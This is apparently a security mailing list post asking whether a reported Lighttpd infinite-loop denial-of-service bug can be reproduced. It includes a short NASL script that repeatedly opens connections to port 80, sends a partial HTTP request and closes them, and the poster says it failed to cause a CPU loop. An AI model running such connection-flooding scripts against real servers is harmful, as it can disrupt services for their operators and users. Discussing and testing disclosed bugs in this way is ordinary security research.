|Main Archive Page > Month Archives > full-disclosure-uk archives|
> Robert Jakabosky discovered an infinite loop triggered by a connection
> abort when Lighttpd processes carriage return and line feed sequences.
Could anybody reproduce this DoS? I tried this NASL script without success. The server rejects connections for about one minute (because of kazillons of sockets in TIME_WAIT), but it only affects the attacking source IP and I could not launch any CPU loop.
$ more /tmp/ec.nasl
while (s = open_sock_tcp(80))
send(socket: s, data: 'GET / HTTP/1.0\r\n'); close(s);
display(i, ' done\n');